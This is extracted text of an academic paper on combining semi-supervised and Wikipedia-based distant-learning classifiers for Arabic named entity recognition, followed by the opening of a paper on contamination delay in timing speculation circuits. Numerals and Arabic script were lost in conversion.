text. instead, our algorithm ranks candidate nes ac- cording to the number of different patterns that are used to extract them, since pattern variety is a better cue to semantics than absolute frequency (baroni et al., ). after sorting the examples according to the num- ber of distinct patterns, all examples but the top m are discarded, where m is set to the number of ex- amples from the previous iteration, plus one. these m examples will be used in the next iteration, and so on. for example, if we start the algorithm with seed instances, the following iteration will start with , and the next one will start with , and so on. this procedure is necessary in order to carefully include examples from one iteration to another and to ensure that bad instances are not passed on to the next iteration. the same procedure was applied by (althobaiti et al., ). . distant learning for distant learning we follow the state of the art ap- proach to exploit wikipedia for arabic ner, as in (althobaiti et al., ). our distant learning sys- tem exploits many of wikipedia’s features, such as anchor texts, redirects, and inter-language links, in order to automatically develop an arabic ne anno- tated corpus, which is used later to train a state-of- the-art supervised classifier. the three steps of this approach are: . classify wikipedia articles into a set of ne types. . annotate the wikipedia text as follows: • identify and label matching text in the title and the first sentence of each article. • label linked phrases in the text according to the ne type of the target article. • compile a list of alternative titles for articles and filter out ambiguous ones. • identify and label matching phrases in the list and the wikipedia text. . filter sentences to prevent noisy sentences from being included in the corpus. we briefly explain these steps in the following sec- tions. . . classifying wikipedia articles the wikipedia articles in the dataset need to be classified into the set of named entity types in the classification scheme. we conduct an experiment that uses simple bag-of-words features extracted from different portions of the wikipedia document and metadata such as categories, the infobox ta- ble, and tokens from the article title and first sen- tence of the document. to improve the accuracy of document classification, tokens are distinguished based on their location in the document. there- fore, categories and infobox features are marked with suffixes to differentiate them from tokens ex- tracted from the article’s body text (tardif et al., ). the feature set is represented by term frequency-inverse document frequency (tf-idf). in order to develop a wikipedia document classifier to categorise wikipedia documents into conll ne types, namely person, location, organisation, mis- cellaneous, or other, we use a set of , manually classified wikipedia articles that are available free online (alotaibi and lee, ). % of the , hand-classified wikipedia articles are used for train- ing, and % for evaluation. the wikipedia docu- ment classifier that we train performs well, achiev- ing an f-score of %. the classifier is then used to classify all wikipedia articles. at the end of this stage, we obtain a list of pairs containing each wikipedia article and its ne type in preparation for the next stage: developing the ne-tagged training corpus. . . the annotation process to begin the annotation process we identify matching terms in the article title and the first sen- tence and then tag the matching phrases with the ne-type of the article. the system adopts partial matching where all corresponding words in the ti- tle and the first sentence should first be identified. then, the system annotates them and all words in between (althobaiti et al., ). the next step is to transform the links between wikipedia articles into ne annotations according to the ne-type of the link target. wikipedia also contains a fair amount of nes without links. we follow the technique proposed by nothman et al. ( ), which suggests inferring additional links using the aliases for each article. thus, we compile a list of alternative titles, in- cluding anchor texts and ne redirects (i.e., the linked phrases and redirected pages that refer to ne articles). it is necessary to filter the list, however, to remove noisy alternative titles, which usually appear due to (a) one-word meaningful named entities that are ambiguous when taken out of context and (b) multi-word alternative titles that contain apposition words (e.g., ‘president’, ‘vice minister’). to this end we use the filtering algorithm proposed by althobaiti et al. ( ) (see algorithm ). in this algorithm a capitalisation probability measure for arabic is introduced. this involves finding the english gloss for each one-word alternative name and then computing its probability of being capitalised in the english wikipedia. in order to find the english gloss for arabic words, wikipedia arabic-to-english cross-lingual links are exploited. in case the english gloss for the arabic word could not be found using inter-language links, an online translator is used. before translating the arabic word, a light stemmer is used to remove prefixes and conjunctions in order to acquire the translation of the word itself without its associated affixes. the capitalisation probability is computed as follows pr[en] = f(en)iscapitalised f(en)iscapitalised+f(en)notcapitalised where en is the english gloss of the alterna- tive name; f(en)iscapitalised is the number of times the english gloss en is capitalised in the english wikipedia; and f(en)notcapitalised is the number of times the english gloss en is not capitalised in the english wikipedia. by specifying a capitalisation threshold constraint, ambiguous one-word titles are prevented from being included in the list of alternative titles. the capitalisation threshold is set to . as suggested in (althobaiti et al., ). the multi-word alternative name is also omitted if any of its words belong to the list of apposition words. . . building the corpus the last stage is to incorporate sentences into the final corpus. we refer to this dataset as the wikipedia-derived corpus (wdc). it contains , sentences of around million tokens. our model was then trained on the wdc corpus. in this algorithm : filtering alternative names input: a set l = {l , l , . . . , ln} of all alternative names of wikipedia articles output: a set rl = {rl , rl , . . . , rln} of reliable alternative names for i ← to n do t ← split li into tokens if (t.size() >= ) then /* all tokens of t do not belong to apposition list */ if (! containappositiveword(t)) then add li to the set rl else lightstem ← findlightstem(li) englishgloss ← translate(lightstem) /* compute capitalisation probability for english gloss */ capprob ← compcapprob(englishgloss) if (capprob > . ) then add li to the set rl paper we refer to this model as the dl classifier. the wdc dataset is available online . we also plan to make the models available to the research community. classifier combination . the case for classifier combination in what follows we use ssl to refer to our semi- supervised classifier (see section . ) and dl to re- fer to our distant learning classifier (see section . ). table shows the results of both classifiers when tested on the anercorp test set (see section for details about the dataset). nes classifiers precision recall fβ= per ssl . . . dl . . . loc ssl . . . dl . . . org ssl . . . dl . . . overall ssl . . . dl . . . table : the results of ssl and dl classifiers on the anercorp test set. as is apparent in table , the ssl classifier tends to be more precise at the expense of recall. the dis- https://sites.google.com/site/mahajalthobaiti/resources https://sites.google.com/site/mahajalthobaiti/resources tant learning technique is lower in precision than the semi-supervised learning technique, but higher in re- call. generally, preference is given to the distant su- pervision classifier in terms of f-score. the classifiers have different strengths. our semi- supervised algorithm iterates between pattern ex- traction and candidate nes extraction and selection. only the candidate nes that the classifier is most confident of are added at each iteration, which re- sults in the high precision. the ssl classifier per- forms better than distant learning in detecting nes that appear in reliable/regular patterns. these pat- terns are usually learned easily during the training phase, either because they contain important ne in- dicators or because they are supported by many re- liable candidate nes. for example, the ssl classi- fier has a high probability to successfully detect aÓ ak. ð @ “obama” and È a g à a ̄ �� ñË “louis van gaal” as per- son names in the following sentences: • . . . aj k a¢� qk. p ð qk ø yË @ aÓ ak. ð @ �� kqË @ h �qå� “president obama said on a visit to britain ...” • . . . à @ yj ��k a kñk q��� �� � aÓ h. p yÓ È a g à a ̄ �� ñË È a�̄ “louis van gaal the manager of manchester united said that ...” the patterns extracted from such sentences in the newswire domain are learned easily during the train- ing phase, as they contain good ne indicators like �� kqË @ “president” and h. p yÓ “manager”. our distant learning method relies on wikipedia structure and links to automatically create ne anno- tated data. it also depends on wikipedia features, such as inter-language links and redirects, to handle the rich morphology of arabic without the need to perform excessive pre-processing steps (e.g., pos- tagging, deep morphological analysis), which has a slight negative effect on the precision of the dl clas- sifier. the recall, however, of the dl classifier is high, covering as many nes as possible in all pos- sible domains. therefore, the dl classifier is better than the ssl classifier in detecting nes that appear in ambiguous contexts (they can be used for differ- ent ne types) and with no obvious clues (ne indi- cators). for example, detecting ø p @q� ̄ “ferrari” and aj »ñ k“nokia” as organization names in the following sentences: also known as trigger words which help in identifying nes within text • . . . ø p @q� ̄ Ð qk ø yË @ ,ñ jk p �� k a� úΫ ñ� �ñË @ Ð y �®�k “alonso got ahead of the renault driver who prevented ferrari from ... ” • �é �® ®�Ë @ Ð aÖ �ß @ à c« @ áÓ Ð ñk yªk. aj »ñ k h. a¢ k z ag. “nokia’s speech came a day after the comple- tion of the deal” the strengths and weaknesses of the ssl and dl classifiers indicates that a classifier ensemble could perform better than its individual components. . classifier combination methods classifier combination methods are suitable when we need to make the best use of the predictions of multiple classifiers to enable higher accuracy classi- fications. dietterich ( a) reviews many methods for constructing ensembles and explains why clas- sifier combination techniques can often gain better performance than any base classifier. tulyakov et al. ( ) introduce various categories of classifier combinations according to different criteria includ- ing the type of the classifier’s output and the level at which the combinations operate. several empir- ical and theoretical studies have been conducted to compare ensemble methods such as boosting, ran- domisation, and bagging techniques (maclin and opitz, ; dietterich, b; bauer and kohavi, ). ghahramani and kim ( ) explore a gen- eral framework for a bayesian model combination that explicitly models the relationship between each classifier’s output and the unknown true label. as such, multiclass bayesian classifier combination (bcc) models are developed to combine predictions of multiple classifiers. their proposed method for bcc in the machine learning context is derived di- rectly from the method proposed in (haitovsky et al., ) for modelling disagreement between human assessors, which in turn is an extension of (dawid and skene, ). similar studies for modelling data annotation using a variety of methods are presented in (carpenter, ; cohn and specia, ). simp- son et al. ( ) present a variant of bcc in which they consider the use of a principled approximate bayesian method, variational bayes (vb), as an in- ference technique instead of using gibbs sampling. they also alter the model so as to use point values for hyper-parameters, instead of placing exponential hyper-priors over them. the following sections detail the combination methods used in this paper to combine the minimally supervised classifiers for arabic ner. . . voting voting is the most common method in classifier combination because of its simplicity and accept- able results (van halteren et al., ; van erp et al., ). each classifier is allowed to vote for the class of its choice. it is common to take the ma- jority vote, where each base classifier is given one vote and the class with the highest number of votes is chosen. in the case of a tie, when two or more classes receive the same number of votes, a random selection is taken from among the winning classes. it is useful, however, if base classifiers are distin- guished by their quality. for this purpose, weights are used to encode the importance of each base clas- sifier (van erp et al., ). equal voting assumes that all classifiers have the same quality (van halteren et al., ). weighted voting, on the other hand, gives more weight to classifiers of better quality. so, each classifier is weighted according to its overall precision, or its precision and recall on the class it suggests. formally, given k classifiers, a widely used com- bination scheme is through the linear interpolation of the classifiers’ class probability distribution as follows p(c |sk (w)) = k∑ k= pk (c |sk (w)) ·λk (w) where pk(c|sk(w)) is an estimation of the proba- bility that the correct classification is c given sk(w), the class for the word w as suggested by classifier k. λk(w) is the weight that specifies the importance given to each classifier k in the combination. pk(c|sk(w)) is computed as follows pk(c|sk(w)) = { , if sk(w) = c , otherwise for equal voting, each classifier should have the same weight (e.g., λk(w) = /k). in case of weighted voting, the weight associated with each classifier can be computed from its precision and/or recall as illustrated above. . . independent bayesian classifier combination (ibcc) using a bayesian approach to classifier combi- nation (bcc) provides a mathematical combina- tion framework in which many classifiers, with var- ious distributions and training features, can be com- bined to provide more accurate information. this framework explicitly models the relationship be- tween each classifier’s output and the unknown true label (levenberg et al., ). this section de- scribes the bayesian approach to the classifier com- bination we adopted in this paper which, like the work of levenberg et al. ( ), is based on simp- son et al. ( ) simplification of ghahramani and kim ( ) model. for ith data point, true label ti is assumed to be generated by a multinomial distribution with the pa- rameter δ: p(ti = j|δ) = δj, which models the class proportions. true labels may take values ti = ...j, where j is the number of true classes. it is also as- sumed that there are k base classifiers. the output of the classifiers are assumed to be discrete with values l = ...l, where l is the number of possible out- puts. the output c(k)i of the classifier k is assumed to be generated by a multinomial distribution with parameters π(k)j : p(c (k) i = l|ti = j,π (k) j ) = π (k) j,l where π(k) is the confusion matrix for the classifier k, which quantifies the decision-making abilities of each base classifier. as in simpson et al. ( ) study, we as- sume that parameters π(k)j and δ have dirichlet prior distributions with hyper-parameters α(k) ,j = [α (k) ,j ,α (k) ,j , ...,α (k) ,jl] and ν = [ν , ,ν , , ...,ν ,j ] respectively. given the observed class labels and based on the above prior, the joint distribution over all variables for the ibcc model is p(δ, Π, t,c|a ,ν) = i∏ i= {δti k∏ k= π (k) ti,c (k) i }p(δ|ν)p(Π|a), where Π = {π(k)j |j = ...j,k = ...k} and a = {α(k) ,j |j = ...j,k = ...k}. the conditional probability of a test data point ti being assigned class j is given by p(ti = j) = ρij∑j y= ρiy , where ρij = δj k∏ k= π j,c (k) i . in our implementation we used point values for a as in (simpson et al., ). the values of hyper- parameters a offered a natural method to include any prior knowledge. thus, they can be regarded as pseudo-counts of prior observations and they can be chosen to represent any prior level of uncertainty in the confusion matrices, Π. our inference tech- nique for the unknown variables (δ,π, and t) was gibbs sampling as in (ghahramani and kim, ; simpson et al., ). figure shows the directed graphical model for ibcc. the c(k)i represents ob- served values, circular nodes are variables with dis- tributions and square nodes are variables instantiated with point values. 𝝂𝟎 𝜶𝟎 (𝒌) classifiers: k= , , …, k data points: i= , , …, i 𝜹 𝝅(𝒌) 𝒄𝒊 (𝒌) 𝒕𝒊 figure : the directed graph of ibcc. data in this section, we describe the two datasets we used: • validation set (news + bbcnews): % of this dataset is used to estimate the weight of each base classifier and % is used to perform error analysis. • test set (anercorp test set): this dataset is used to evaluate different classifier combina- tion methods. the validation set is composed of two datasets: news and bbcnews. the news set contains around k tokens collected by darwish ( ) also known as development set. from the rss feed of the arabic (egypt) version of news.google.com from october . we created the bbcnews corpus by collecting a representa- tive sample of news from bbc in may . it con- tains around k tokens and covers different types of news such as politics, economics, and entertainment. the anercorp test set makes up % of the whole anercorp set. the anercorp set is a news- wire corpus built and manually tagged especially for the arabic ner task by benajiba et al. ( a) and contains around k tokens. this test set is com- monly used in the arabic ner literature to evaluate supervised classifiers (benajiba and rosso, ; abdul-hamid and darwish, ; abdallah et al., ; oudah and shaalan, ) and minimally- supervised classifiers (alotaibi and lee, ; al- thobaiti et al., ; althobaiti et al., ), which allows us to review the performance of the combined classifiers and compare it to the performance of each base classifier. experimental analysis . experimental setup in the ibcc model, the validation data was used as known ti to ground the estimates of model param- eters. the hyper-parameters were set as α(k)j = and νj = (kim and ghahramani, ; leven- berg et al., ). the initial values for random variables were set as follows: (a) the class propor- tion δ was initialised to the result of counting ti and (b) the confusion matrix π was initialised to the re- sult of counting ti and the output of each classifier c(k). gibbs sampling was run well past stability (i.e., iterations). stability was actually reached in approximately iterations. all parameters required in voting methods were specified using the validation set. we examined two different voting methods: equal voting and weighted voting. in the case of equal voting, each classifier was given an equal weight, ( /k) where k was the number of classifiers to be combined. in weighted voting, total precision was used in order to give pref- erence to classifiers with good quality. . results and discussion . . a simple baseline combined classifier a proposed combined classifier simply and straightforwardly makes decisions based on the agreed decisions of the base classifiers, namely the ssl classifier and dl classifier. that is, if the base classifiers agree on the ne type of a certain word, then it is annotated by an agreed ne type. in the case of disagreement, the word is considered not named entity. table shows the results of this combined classifier, which is considered a baseline in this pa- per. precision recall fβ= person . . . location . . . organisation . . . overall . . . table : the results of the baseline the results of the combined classifier shows very high precision, which indicates that both base clas- sifiers are mostly accurate. the base classifiers also commit different errors that are evident in the low recall. the accuracy and diversity of the single clas- sifiers are the main conditions for a combined clas- sifier to have better accuracy than any of its com- ponents (dietterich, a). therefore, in the next section we take into consideration various classifier combination methods in order to aggregate the best decisions of ssl and dl classifiers, and to improve overall performance. . . combined classifiers: classifier combination methods the ssl and dl classifiers are trained with two different algorithms using different training data. the ssl classifier is trained on anercorp training data, while the dl classifier is trained on a corpus automatically derived from arabic wikipedia, as ex- plained in section . and . . we combine the ssl and dl classifiers using the three classifier combination methods, namely equal voting, weighted voting, and ibcc. table shows the results of these classifier combination methods. the ibcc scheme outperforms all voting techniques and base classifiers in terms of f-score. regard- ing precision, voting techniques show the highest scores. however, the high precision is accompanied by a reduction in recall for both voting methods. the ibcc combination method also has relatively high precision compared to the precision of base classi- fiers. much better recall is registered for ibcc, but it is still low. nes combination methods precision recall fβ= per equal voting . . . weighted voting . . . ibcc . . . loc equal voting . . . weighted voting . . . ibcc . . . org equal voting . . . weighted voting . . . ibcc . . . overall equal voting . . . weighted voting . . . ibcc . . . nes base classifiers precision recall fβ= overall ssl . . . dl . . . table : the performances of various combination meth- ods. . . combined classifiers: restriction of the combination process an error analysis of the validation set shows that . % of the nes were correctly detected by the semi-supervised classifier, but considered not nes by the distant learning classifier. at the same time, the distant learning classifier managed to correctly detect . % of the nes that were considered not nes by the semi-supervised classifier. we also no- ticed that false positive rates, i.e. the possibility of considering a word ne when it is actually not ne, are very low ( . % and . % for the semi- supervised and distant learning classifiers respec- tively). these low false positive rates and the high percentage of the nes that are detected and missed by the two classifiers in a mutually exclusive way can be exploited to obtain better results, more specif- ically, to increase recall without negatively affect- ing precision. therefore, we restricted the combi- nation process to only include situations where the base classifiers agree or disagree on the ne type of a certain word. the combination process is ignored in cases where the base classifiers only disagree on detecting nes. for example, if the base classifiers disagree on whether a certain word is an ne or not, the word is automatically considered an ne. figure provides some examples that illustrate the restric- tions we applied to the combination process. the annotations in the examples are based on the conll annotation guidelines (chinchor et al., ). predictions of ssl classifier predictions of dl classifier b-per b-loc o b-loc b-org o b-per b-per apply combination method b-loc b-org apply combination method figure : examples of restricting the combination pro- cess. restricting the combination process in this way increases recall without negatively affecting the pre- cision, as seen in table . the increase in recall makes the overall f-score for all combination meth- ods higher than those of base classifiers. this way of using the ibcc model results in a performance level that is superior to all of the individual clas- sifiers and other voting-based combined classifiers. therefore, the ibcc model leads to a % increase in the performance of the best base classifier, while voting methods increase the performance by around % - %. these results highlight the role of re- stricting the combination, which affects the perfor- mance of combination methods and gives more con- trol over how and when the predictions of base clas- sifiers should be combined. . . comparing combined classifiers: statistical significance of results we tested whether the difference in performance between the three classifier combination methods - equal voting, weighted voting, and ibcc - is sig- nificant using two different statistical tests over the results of these combination methods on an aner- corp test set. the alpha level of . was used as a significance criterion for all statistical tests. first, we ran a non-parametric sign test. the small p- value (p � . ) for each pair of the three combina- nes combination methods precision recall fβ= per equal voting . . . weighted voting . . . ibcc . . . loc equal voting . . . weighted voting . . . ibcc . . . org equal voting . . . weighted voting . . . ibcc . . . overall equal voting . . . weighted voting . . . ibcc . . . nes base classifiers precision recall fβ= overall ssl . . . dl . . . table : the performances of various combination meth- ods when restricting the combination process. tion methods, as seen in table , suggests that these methods are significantly different. the only com- parison where no significance was found is equal voting vs. weighted voting, when we used them to combine the data without any restrictions (p = . ). combination methods (without restriction) equal voting weighted voting ibcc equal voting weighted voting . ibcc < . e- < . e- combination methods (with restriction) equal voting weighted voting ibcc equal voting weighted voting . e- ibcc < . e- . e- table : the sign test results (exact p values) for the pair- wise comparisons of the combination methods. second, we used a bootstrap sampling (efron and tibshirani, ), which is becoming the de facto standards in nlp (søgaard et al., ). table compares each pair of the three combination meth- ods using a bootstrap sampling over documents with , replicates. it shows the p-values and confi- dence intervals of the difference between means. combination with restriction combination methods comparison p-value [ % ci] weighted voting, equal voting . [ . , . ] ibcc, equal voting . [ . , . ] ibcc, weighted voting . [ . , . ] combination without restriction combination methods comparison p-value [ % ci] weighted voting, equal voting . [- . , . ] ibcc, equal voting . [ . , . ] ibcc, weighted voting . [ . , . ] table : the bootstrap test results (p-values and ci) for the pairwise comparisons of the combination methods. the differences in performance between almost all the three methods of combination are highly sig- nificant. the one exception is the comparison be- tween equal voting and weighted voting, when they are used as a combination method without restric- tion, which shows a non-significant difference (p- value = . , ci = - . to . ). generally, the ibcc scheme performs signifi- cantly better than voting-based combination meth- ods whether we impose restrictions on the combina- tion process or not, as can be seen in table and table . conclusion major advances over the past decade have occurred in arabic ner with regard to utilising various su- pervised systems, exploring different features, and producing manually annotated corpora that mostly cover the standard set of ne types. more effort and time for additional manual annotations are re- quired when expanding the set of ne types, or ex- porting ne classifiers to new domains. this has mo- tivated research in minimally supervised methods, such as semi-supervised learning and distant learn- ing, but the performance of such methods is lower than that achieved by supervised methods. how- ever, semi-supervised methods and distant learning tend to have different strengths, which suggests that better results may be obtained by combining these methods. therefore, we trained two classifiers based on distant learning and semi-supervision techniques, and then combined them using a variety of classifier combination schemes. our main contributions in- clude the following: • we presented a novel approach to arabic ner using a combination of semi-supervised learning and distant supervision. • we used the independent bayesian classifier combination (ibcc) scheme for ner, and com- pared it to traditional voting methods. • we introduced the classifier combination restric- tion as a means of controlling how and when the predictions of base classifiers should be com- bined. this research demonstrated that combining the two minimal supervision approaches using various clas- sifier combination methods leads to better results for ner. the use of ibcc improves the performance by percentage points over the best base classi- fier, whereas the improvement in the performance when using voting methods is only to percent- age points. although all combination methods re- sult in an accurate classification, the ibcc model achieves better recall than other traditional combi- nation methods. our experiments also showed how restricting the combination process can increase the recall ability of all the combination methods without negatively affecting the precision. the approach we proposed in this paper can be easily adapted to new ne types and different do- mains without the need for human intervention. in addition, there are many ways to restrict the combi- nation process according to the applications’ prefer- ences, either producing high accuracy or recall. for example, we may obtain a highly accurate combined classifier if we do not combine the predictions of all base classifiers for a certain word and automatically consider it not ne when one of the base classifier considers this word not ne. references sherief abdallah, khaled shaalan, and muhammad shoaib. . integrating rule-based system with classification for arabic named entity recognition. in computational linguistics and intelligent text pro- cessing, pages – . springer. samir abdelrahman, mohamed elarnaoty, marwa magdy, and aly fahmy. . integrated machine learning techniques for arabic named entity recogni- tion. ijcsi, : – . ahmed abdul-hamid and kareem darwish. . sim- plified feature set for arabic named entity recognition. in proceedings of the named entities workshop, pages – . association for computational lin- guistics. steven abney. . semisupervised learning for com- putational linguistics. crc press. fahd alotaibi and mark lee. . mapping ara- bic wikipedia into the named entities taxonomy. in proceedings of coling : posters, pages – , mumbai, india, december. the coling orga- nizing committee. fahd alotaibi and mark lee. . automatically de- veloping a fine-grained arabic named entity corpus and gazetteer by utilizing wikipedia. in ijcnlp. maha althobaiti, udo kruschwitz, and massimo poesio. . a semi-supervised learning approach to arabic named entity recognition. in proceedings of the inter- national conference recent advances in natural lan- guage processing ranlp , pages – , hissar, bulgaria, september. incoma ltd. shoumen, bul- garia. maha althobaiti, udo kruschwitz, and massimo poesio. . automatic creation of arabic named entity annotated corpus using wikipedia. in proceedings of the student research workshop at the th confer- ence of the european chapter of the association for computational linguistics (eacl), pages – , gothenburg. marco baroni, brian murphy, eduard barbu, and mas- simo poesio. . strudel: a corpus-based seman- tic model based on properties and types. cognitive science, ( ): – . eric bauer and ron kohavi. . an empirical comparison of voting classification algorithms: bag- ging, boosting, and variants. machine learning, ( - ): – . yassine benajiba and paolo rosso. . arabic named entity recognition using conditional random fields. in proc. of workshop on hlt & nlp within the arabic world, lrec, volume , pages – . yassine benajiba, paolo rosso, and josé miguel benedı́ruiz. a. anersys: an arabic named en- tity recognition system based on maximum entropy. in computational linguistics and intelligent text pro- cessing, pages – . springer. yassine benajiba, paolo rosso, and josé miguel benedı́ruiz. b. anersys: an arabic named en- tity recognition system based on maximum entropy. in computational linguistics and intelligent text pro- cessing, pages – . springer. yassine benajiba, mona diab, paolo rosso, et al. . arabic named entity recognition: an svm-based ap- proach. in proceedings of arab international conference on information technology (acit), pages – . bob carpenter. . multilevel bayesian models of categorical data annotation. unpublished manuscript. available online at http://lingpipe-blog.com/lingpipe- white-papers/, last accessed -march- . nancy chinchor, erica brown, lisa ferro, and patty robinson. . named entity recognition task definition. mitre and saic. trevor cohn and lucia specia. . modelling anno- tator bias with multi-task gaussian processes: an ap- plication to machine translation quality estimation. in acl, pages – . kareem darwish. . named entity recognition us- ing cross-lingual resources: arabic as an example. in acl, pages – . alexander philip dawid and allan m skene. . max- imum likelihood estimation of observer error-rates us- ing the em algorithm. applied statistics, pages – . thomas g. dietterich. a. ensemble methods in ma- chine learning. in multiple classifier systems, volume of lecture notes in computer science, pages – . springer berlin heidelberg. thomas g dietterich. b. an experimental compar- ison of three methods for constructing ensembles of decision trees: bagging, boosting, and randomization. machine learning, ( ): – . bradley efron and robert j tibshirani. . an intro- duction to the bootstrap. crc press. ali elsebai, farid meziane, and fatma zohra belkredim. . a rule based persons names arabic extraction system. communications of the ibima, ( ): – . radu florian, abe ittycheriah, hongyan jing, and tong zhang. . named entity recognition through clas- sifier combination. in proceedings of the seventh con- ference on natural language learning at hlt-naacl -volume , pages – . association for com- putational linguistics. zoubin ghahramani and hyun-chul kim. . bayesian classifier combination. technical report, university college london. y haitovsky, a smith, and y liu. . modelling dis- agreements among and within raters assessments from the bayesian point of view. in draft. presented at the valencia meeting . hyun-chul kim and zoubin ghahramani. . bayesian classifier combination. in international con- ference on artificial intelligence and statistics, pages – . abby levenberg, stephen pulman, karo moilanen, ed- win simpson, and stephen roberts. . predict- ing economic indicators from web text using sentiment composition. international journal of computer and communication engineering, ( ): – . richard maclin and david opitz. . an empiri- cal evaluation of bagging and boosting. aaai/iaai, : – . slim mesfar. . named entity recognition for ara- bic using syntactic grammars. in natural language processing and information systems, pages – . springer. peter mika, massimiliano ciaramita, hugo zaragoza, and jordi atserias. . learning to tag and tag- ging to learn: a case study on wikipedia. vol- ume , pages – . mike mintz, steven bills, rion snow, and dan jurafsky. . distant supervision for relation extraction with- out labeled data. in proceedings of the joint confer- ence of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp: volume - volume , acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. david nadeau and satoshi sekine. . a survey of named entity recognition and classification. lingvisti- cae investigationes, ( ): – . david nadeau. . semi-supervised named entity recognition: learning to recognize entity types with little supervision. truc-vien t. nguyen and alessandro moschitti. . end-to-end relation extraction using distant supervi- sion from external semantic repositories. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies: short papers - volume , hlt ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. joel nothman, nicky ringland, will radford, tara mur- phy, and james r curran. . learning multilin- gual named entity recognition from wikipedia. ar- tificial intelligence, : – . mai oudah and khaled f shaalan. . a pipeline ara- bic named entity recognition using a hybrid approach. in coling, pages – . marius pasca, dekang lin, jeffrey bigham, andrei lif- chits, and alpa jain. . organizing and searching the world wide web of facts-step one: the one-million fact extraction challenge. in aaai, volume , pages – . alexander e richman and patrick schone. . mining wiki resources for multilingual named entity recog- nition. in acl, pages – . ellen riloff and rosie jones. . learning dictionar- ies for information extraction by multi-level bootstrap- ping. in aaai, pages – . sriparna saha and asif ekbal. . combining mul- tiple classifiers using vote based classifier ensemble technique for named entity recognition. data & knowledge engineering, : – . satoshi sekine et al. . nyu: description of the japanese ne system used for met- . in proceed- ings of the seventh message understanding confer- ence (muc- ), volume . khaled shaalan and hafsa raza. . nera: named entity recognition for arabic. journal of the ameri- can society for information science and technology, ( ): – . edwin simpson, stephen roberts, ioannis psorakis, and arfon smith. . dynamic bayesian combination of multiple imperfect classifiers. in decision making and imperfection, pages – . springer. anders søgaard, anders johannsen, barbara plank, dirk hovy, and hector martinez. . whats in a p-value in nlp? in proceedings of the eighteenth conference on computational natural language learning (conll ), pages – . sam tardif, james r. curran, and tara murphy. . improved text categorisation for wikipedia named entities. in proceedings of the australasian language technology association workshop, pages – . sergey tulyakov, stefan jaeger, venu govindaraju, and david doermann. . review of classifier combi- nation methods. in machine learning in document analysis and recognition, pages – . springer. merijn van erp, louis vuurpijl, and lambert schomaker. . an overview and comparison of voting methods for pattern recognition. in eighth international work- shop on frontiers in handwriting recognition, pages – . ieee. hans van halteren, walter daelemans, and jakub za- vrel. . improving accuracy in word class tagging through the combination of machine learning systems. computational linguistics, ( ): – . wajdi zaghouani. . critical survey of the freely available arabic corpora. in workshop on free/open-source arabic corpora and corpora pro- cessing tools, pages – , reykjavik, iceland. tong zhang, fred damerau, and david johnson. . text chunking based on a generalization of winnow. the journal of machine learning research, : – . submitted october accepted july published august corresponding author naga durga prasad avirneni, prasad.avirneni@gmail.com academic editor soha hassoun additional information and declarations can be found on page doi . /peerj-cs. copyright avirneni et al. distributed under creative commons cc-by . open access managing contamination delay to improve timing speculation architectures naga durga prasad avirneni , , prem kumar ramesh , and arun k. somani department of electrical and computer engineering, iowa state university, ames, ia, usa current affiliation: qualcomm, san diego, ca, usa current affiliation: intel, bengaluru, karnataka, india abstract timing speculation (ts) is a widely known method for realizing better-than-worst- case systems. aggressive clocking, realizable by ts, enable systems to operate beyond specified safe frequency limits to effectively exploit the data dependent circuit delay. however, the range of aggressive clocking for performance enhancement under ts is restricted by short paths. in this paper, we show that increasing the lengths of short paths of the circuit increases the effectiveness of ts, leading to performance improvement. also, we propose an algorithm to efficiently add delay buffers to selected short paths while keeping down the area penalty. we present our algorithm results for iscas- suite and show that it is possible to increase the circuit contamination delay by up to % without affecting the propagation delay. we also explore the possibility of increasing short path delays further by relaxing the constraint on propagation delay and analyze the performance impact. subjects algorithms and analysis of algorithms, computer architecture, embedded computing, emerging technologies keywords timing speculation, timing errors, pvt variation, overclocking, delay insertion, timing constraints, reliable and aggressive systems, contamination delay introduction systems have traditionally been designed to function reliably for the worst case timing delays under adverse operating conditions. such worst case scenarios occur rarely, allowing possible performance improvement by making common cases faster. alternative to conventional methods, the concept of latching data speculatively is called timing speculation (ts) (austin, ; bezdek, ; ernst et al., ; greskamp et al., ; greskamp & torrellas, ; avirneni & somani, ; subramanian et al., ). dual latch based ts is a widely accepted methodology for designing better-than-worst-case digital circuits. timing speculation based aggressive systems are designed on the philosophy that it is profitable to operate beyond worst-case limits to achieve best performance by not avoiding, but detecting and correcting a modest number of timing errors. aggressive design methodology exploit the fact that timing critical paths are rarely exercised in a design and typical execution happens much faster. recent works have also shown that the performance loss due to over provisioning based on worst-case design margins is upward of % in terms of operating frequency and upward of % in terms of power efficiency (gupta et al., ). timing speculation combined with timing error tolerance is a powerful technique how to cite this article avirneni et al. ( ), managing contamination delay to improve timing speculation architectures. peerj com- put. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:prasad.avirneni@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. to ( ) achieve energy efficiency by under-volting, as in razor (ernst et al., ), or ( ) performance enhancement by overclocking, as in sprit e (bezdek, ). dual latch based ts require additional clock resources for the replicated latches (or flip-flops), which are triggered by a phase shifted clock of the original register. despite the area and routing overheads, the benefits achieved by dual latched ts remain immense (ernst et al., ; avirneni & somani, ; subramanian et al., ; das et al., ; ramesh, subramanian & somani, ; avirneni & somani, ; avirneni, ramesh & somani, ). however, in subramanian et al. ( ) it has been pointed out that the performance benefits realized through ts is limited by the short paths of the circuit. it is due to the tight timing constraints that need to met for error recovery. this problem is compounded when circuits have a significantly lower contamination delay. the contamination delay is defined as the smallest time it takes a circuit to change any of its outputs, when there is a change in the input. it has been shown that for a carry-look ahead (cla) adder significant performance enhancement is achieved when its contamination delay is increased by adding buffers (subramanian et al., ). increasing the delay of all shorter paths in the circuit above a desired lower bound, while not affecting the critical path is one of the steps performed during synthesis of sequential circuits to fix hold time violations. however, increasing the contamination delay of a logic circuit significantly, sometimes as high as half the propagation delay, without affecting its propagation delay is not a trivial issue (shenoy, brayton & sangiovanni-vincentelli, ). at the first glance, it might appear that adding delay by inserting buffers to the shortest paths will solve the problem. however, delay of a circuit is strongly input value dependent, and the structure of the circuit plays a role in deciding the value of an output in a particular cycle. current synthesis tools support increasing the delay of short paths through their hold violation fixing option. our major goal in this paper is to extend the hold time of the replicated register present in dual latch ts framework. traditional delay optimization approaches consider only part of the problem, 